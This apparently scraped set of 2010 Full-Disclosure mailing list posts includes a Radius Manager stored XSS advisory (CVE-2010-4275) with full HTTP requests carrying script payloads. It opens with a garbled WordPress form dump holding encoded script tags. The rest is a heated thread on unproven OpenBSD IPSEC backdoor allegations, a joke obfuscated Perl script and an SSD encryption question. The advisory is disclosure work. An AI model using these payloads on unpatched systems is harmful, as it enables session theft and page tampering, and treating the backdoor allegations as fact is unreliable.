n o n c e = c 2 f e 5 5 3 5 c 4 c l o s e d p o s t b o x e s n o n c e = b a
d 9 d c 7 7 5 b w p -
preview=hidden_post_status=publishpost_status=publishhidden_post_password=hidden_post_v
isibility=publicvisibility=publicpost_password=mm=11jj=17aa=2010hh=00mn=05ss=33hi
dden_mm=11cur_mm=11hidden_jj=17cur_jj=17hidden_aa=2010cur_aa=2010hidden_hh=00
cur_hh=00hidden_mn=05cur_mn=36original_publish=Updatesave=Updatepost_category
% 5 B % 5 D = 0 p o s t _ c a t e g o r y % 5 B % 5 D = 1 n e w c a t e g o
r y = N e w + C a t e g o r y
+Namenewcategory_parent=-1_ajax_nonce-add-category=62352e38f5tax_input%5Bpost_tag
% 5 D = n e w t a g % 5 B p o s t _ t a g
%5D=post_title=testandosamplepermalinknonce=4a0d9c8491content=%5Byoutube+%3Cscript
+type%3D%22text%2Fjavascript%22%3E%2F%2F+%3C%21%5BCDATA%5B%0D%0Aalert
%281%29%0D%0A%2F%2F+%5D%5D%3E%3C%2Fscript%3E+%3Cscript+type%3D%22text
%2Fjavascript%22%3E%2F%2F+%3C%21%5BCDATA%5B%0D%0Aalert%282%29%0D%0A%2F
%2F+%5D%5D%3E%3C%2Fscript%3E%5Dexcerpt=trackback_url=meta%5B6%5D%5Bkey
%5D=_edit_last_ajax_nonce=5453d93de8meta%5B6%5D%5Bvalue%5D=1meta%5B9%5D
%5Bkey%5D=_edit_lock_ajax_nonce=5453d93de8meta%5B9%5D%5Bvalue
%5D=1289954192meta%5B8%5D%5Bkey%5D=_wp_old_slug_ajax_nonce=5453d93de8meta
% 5 B 8 % 5 D % 5 B v a l u e % 5 D = m e t a k e y i n p u t = m e t a v a
l u e = _ a j a x _ n o n c e - a d d -
[Full-disclosure] Radius Manager Multiple Cross Site Scripting (XSS) Vulnerabilities - CVE-2010-4275
Dear List, I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability. Check Point Software Technologies - Vulnerability Discovery Team (VDT) http://www.checkpoint.com/defense/ Radius Manager Multiple Cross Site Scripting Issues CVE-2010-4275 INTRODUCTION Radius Manager is a centralized way for administration of Mikrotik, Cisco, Chillispot and StarOS routers and wireless access points. It has a centralized accounting system that uses Radius, provinding easy user and accounting management for ISP's. This problem was confirmed in the following versions of the Radius Manager, other versions maybe also affected. Radius Manager 3.8.0 CVSS Scoring System The CVSS score is: 6.4 Base Score: 6.7 Temporal Score: 6.4 We used the following values to calculate the scores: Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N Temporal score is: E:F/RL:U/RC:C DETAILS The Radius Manager system is affected by Multiple Stored Cross Site Scripting. The “Group Name” and “Description” in “new_usergroup” menu do not sanitize input data, allowing attacker to store malicious javascript code in a page. The same thing occurs with “new_nas” menu Request: http://server/admin.php?cont=update_usergroupid=1 POST /admin.php?cont=update_usergroupid=1 HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://server/admin.php?cont=edit_usergroupid=1 Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 120 name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3Edescr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3ESubmit=Update Request 2: http://serveR/admin.php?cont=store_nas POST /admin.php?cont=store_nas HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://server/admin.php?cont=new_nas Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 112 name=Namenasip=10.0.0.1type=0secret=descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3ESubmit=Add+NAS CREDITS This vulnerability has been brought to our attention by Ulisses Castro from Conviso IT Security company (http://www.conviso.com.br) and researched internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT). Rodrigo Rubira Branco Senior Security Researcher Vulnerability Discovery Team (VDT) Check Point Software Technologies http://www.checkpoint.com/defense ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC
--On December 17, 2010 12:31:37 PM -0500 Larry Seltzer la...@larryseltzer.com wrote: The one thing Mr. Perry has not done, and which, if his claims have any merit at all, he could easily do, since he claims he's no longer under NDA, is post the code that proves that there is a backdoor. After all, he supposedly wrote it, along with others. Actually, he did not say that he wrote code. He said that Jason Wright and several other developers were responsible for those backdoors I quote Mr. Perry: I left NETSEC in 2000 to start another venture, I had some fairly significant concerns with many aspects of these projects, and I was the lead architect for the site-to-site VPN project developed for Executive Office for United States Attorneys, which was a statically keyed VPN system used at 235+ US Attorney locations and which later proved to have been backdoored by the FBI so that they could recover (potentially) grand jury information from various US Attorney sites across the United States and abroad. Still think he never wrote any and had no knowledge of the code? What does lead architect mean? -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC
--On December 17, 2010 12:37:34 PM -0500 Григорий Братислава musntl...@gmail.com wrote: Is no one asking you for is your expertease Mr. Schmehl, is in fact we say is you need retire back to мошонка sniffing Think of me as a bozo detector. -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenIBDS (OpenBSD is Backdoor Detection System) tool
Thank you man.
However has you to has know that the acronym means Open Backdoored Software
Distribution.
Chairs.
--- On Fri, 12/17/10, Григорий Братислава musntl...@gmail.com wrote:
From: Григорий Братислава musntl...@gmail.com
Subject: [Full-disclosure] OpenIBDS (OpenBSD is Backdoor Detection System) tool
To: full-disclosure@lists.grok.org.uk
Date: Friday, December 17, 2010, 4:57 PM
Hello full-disclosure!!!
I want to warn you about **potential** problem in is with OpenBSD and
backdoor so I make is for you:
OpeniBDS - OpenBSD is Backdoor Detection System) with BSD license to reuse.
# !/usr/bin/perl -p
# openibds.pl (OpenBSD is Backdoor Detection System)
# Copyright (c) 2011, Григорий Братислава
# is usage:
# cd /usr/src/sys/crypto
# perl pwneruski.pl crypto* | grep pelcgbc | tail -n 1
# is you see pelcgbc then is you has backdoor
# Is tested on OpenBSD, Linux, BeOS
# All rights reserved.
# Redistribution is and use in source and binary forms, is with or
without modification,
# are permitted is provided that the following conditions are met:
# Redistributions of is source code must retain the above copyright
notice, this list is
# of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright
notice, this is list
# is of conditions and is the following disclaimer in the
documentation and/or other
# materials provided with the distribution.
# Neither the name of the Григорий Братислава nor the names of its
contributors may be
# used to endorse or promote products derived from this software
without specific prior
# written permission.
# THIS SOFTWARE IS IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS AS IS IS AND
# IS ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
IS THE IMPLIED
# WARRANTIES IS OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED.
# IN IS NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT
# NOT IS LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY,
# WHETHER IN IS CONTRACT, STRICT IS LIABILITY, OR IS TORT (INCLUDING
NEGLIGENCE OR
# OTHERWISE) ARISING IN IS ANY WAY OUT OF THE IS USE OF THIS SOFTWARE,
EVEN IF IS ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
BEGIN { @a = split //, /-35753=?=357x2; }
s.([a-zA-Z]).ord
$197?uc($1^$a[ord($1)-65]):lc($1^$a[ord($1)-97]).ge;#is_pwneruski
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC
I'm an information system's architect, and I do just that, I build the plan for a system. I select technology and get the overall plan done. I then hand off the plan to someone who does the design. That person takes my plan and working with some help from me, gets more physical, how much bandwidth, memory, CPUs, storage, what DB, specifically how many modules, what the modules do, what other modules they communicate with. The designer then hands of his/her design to the programmers. He/She supervises, and helps with the test cases, but generally does not see the code. The Architect very rarely sees the code. Check the lead programmers, and in the case of VPN/IPSec programmers, they are probably going to be very good programmers with a ton of experience. Easily capable of this type of thing, but on the other hand, well knows with a reputation to protect. I'm not saying if this was done or not, it could be, but probably wasn't. What you can be sure of is that the actual doing was done much closer to the programmer than the Architect. Gary B On 12/17/2010 12:52 PM, Paul Schmehl wrote: --On December 17, 2010 12:31:37 PM -0500 Larry Seltzer la...@larryseltzer.com wrote: The one thing Mr. Perry has not done, and which, if his claims have any merit at all, he could easily do, since he claims he's no longer under NDA, is post the code that proves that there is a backdoor. After all, he supposedly wrote it, along with others. Actually, he did not say that he wrote code. He said that Jason Wright and several other developers were responsible for those backdoors I quote Mr. Perry: I left NETSEC in 2000 to start another venture, I had some fairly significant concerns with many aspects of these projects, and I was the lead architect for the site-to-site VPN project developed for Executive Office for United States Attorneys, which was a statically keyed VPN system used at 235+ US Attorney locations and which later proved to have been backdoored by the FBI so that they could recover (potentially) grand jury information from various US Attorney sites across the United States and abroad. Still think he never wrote any and had no knowledge of the code? What does lead architect mean? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC
On Fri, 17 Dec 2010 11:52:43 CST, Paul Schmehl said: Still think he never wrote any and had no knowledge of the code? What does lead architect mean? The other architect levels are bronze, silver, gold, and platinum, right? Most of the time, the chief designer/architect is too busy architecting and designing to actually sling much code themselves. pgpFP9Rtp7ewI.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC
I is quote Mr. Smell He is say: I was the lead architect for the site-to-site VPN project developed for Executive Office for United States Attorneys ^^ Perry no is say: I was the lead architect for the backdoor code in is the ^^ OpenBSD crypto vpn ^^ Architect is tell people what to do. Is you think he as architect of building should keep concrete from foundation? For ten years? Вы - обезьяна As is for backdoors in is that time era (1999) this is would be part of CESA is you know how to Google, you Google it: http://www.google.com/search?hl=ensource=hpq=cesa+1999+%2Bopenbsd+%2Bcyberspace+electronic+security+actaq=faqi=aql=oq=gs_rfai=шпион!!! Is you think you is know all of it Paul ВЫ-Arche!!! This bigger than you know of... is ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC
On Fri, Dec 17, 2010 at 1:17 PM, valdis.kletni...@vt.edu wrote: On Fri, 17 Dec 2010 11:52:43 CST, Paul Schmehl said: Still think he never wrote any and had no knowledge of the code? What does lead architect mean? The other architect levels are bronze, silver, gold, and platinum, right? Most of the time, the chief designer/architect is too busy architecting and designing to actually sling much code themselves. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Is obvious Valdis must be involved for no agree to Mr. Smell. Valdis is you must understand is to pay Schmel no mind (http://www.aolsvc.merriam-webster.aol.com/dictionary/senile) for is he too smart for all of us to is understand. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC
Has I said, that has may true for your organisations hould not be true for others. Each organisation has organised has it can. Has small entity may has the architect design and put the concrete. Has big company most probably has you said. It depends. No one except NETSEC has knowing of NETSEC organization. Anyhas, it has very probability Mr Perry is wright. Le vendredi 17 décembre 2010 à 13:14 -0500, Gary Baribault a écrit : I'm an information system's architect, and I do just that, I build the plan for a system. I select technology and get the overall plan done. I then hand off the plan to someone who does the design. That person takes my plan and working with some help from me, gets more physical, how much bandwidth, memory, CPUs, storage, what DB, specifically how many modules, what the modules do, what other modules they communicate with. The designer then hands of his/her design to the programmers. He/She supervises, and helps with the test cases, but generally does not see the code. The Architect very rarely sees the code. Check the lead programmers, and in the case of VPN/IPSec programmers, they are probably going to be very good programmers with a ton of experience. Easily capable of this type of thing, but on the other hand, well knows with a reputation to protect. I'm not saying if this was done or not, it could be, but probably wasn't. What you can be sure of is that the actual doing was done much closer to the programmer than the Architect. Gary B On 12/17/2010 12:52 PM, Paul Schmehl wrote: --On December 17, 2010 12:31:37 PM -0500 Larry Seltzer la...@larryseltzer.com wrote: The one thing Mr. Perry has not done, and which, if his claims have any merit at all, he could easily do, since he claims he's no longer under NDA, is post the code that proves that there is a backdoor. After all, he supposedly wrote it, along with others. Actually, he did not say that he wrote code. He said that Jason Wright and several other developers were responsible for those backdoors I quote Mr. Perry: I left NETSEC in 2000 to start another venture, I had some fairly significant concerns with many aspects of these projects, and I was the lead architect for the site-to-site VPN project developed for Executive Office for United States Attorneys, which was a statically keyed VPN system used at 235+ US Attorney locations and which later proved to have been backdoored by the FBI so that they could recover (potentially) grand jury information from various US Attorney sites across the United States and abroad. Still think he never wrote any and had no knowledge of the code? What does lead architect mean? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenIBDS (OpenBSD is Backdoor Detection System) tool
On Fri, Dec 17, 2010 at 11:57:55AM -0500, ?? wrote:
Hello full-disclosure!!!
# !/usr/bin/perl -p
# openibds.pl (OpenBSD is Backdoor Detection System)
# Copyright (c) 2011,
Copyright 2011, huh? You is can copyright Abhijit Menon-Sen's work,
which is hosted on Jay Kominek's homepage?
http://www.miranda.org/~jkominek/rot13/perl/rot13-evil.pl
[snippity snip]
BEGIN { @a = split //, /-35753=?=357x2; }
s.([a-zA-Z]).ord
$197?uc($1^$a[ord($1)-65]):lc($1^$a[ord($1)-97]).ge;#is_pwneruski
Which is the 5th search result from:
http://lmgtfy.com/?q=perl+rot13+clever
A mere script kiddie would have gone with the first link on the
results page. I guess we should be in awe of your awesome google-fu,
if not your 1337 Perl-fu.
--
Erik Falor
Registered Linux User #445632 http://counter.li.org
pgp2EfLtObSh9.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SSD and WDE
I've spent some time Googling and haven't found anything I wasn't already aware of. I'm wondering if anyone is aware of any academic or technical studies of whole disk encryption for solid state discs. Any issues uncovered that only apply to that specific combination and not to WDE in general would be of great interest. (I'm not interested in articles on the cold boot attack. I'm already familiar with that one.) -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSD and WDE
Hi Paul, I'm not aware if any, though I'm sure there are some. My understanding is that there shouldn't be any major issues with Full Disk Encryption on SSD. Modifying files might write the new data to a new physical sector, as part of wear levelling, leaving a copy of the old data in the old sector. This might provide some benefit to cryptanalysis. Compared to having a plaintext file system and then encrypting an existing file, which will possibly leave some or all of the plaintext behind due to wear levelling - FDE is much better. On 18/12/2010, at 10:16 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote: I've spent some time Googling and haven't found anything I wasn't already aware of. I'm wondering if anyone is aware of any academic or technical studies of whole disk encryption for solid state discs. Any issues uncovered that only apply to that specific combination and not to WDE in general would be of great interest. (I'm not interested in articles on the cold boot attack. I'm already familiar with that one.) -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
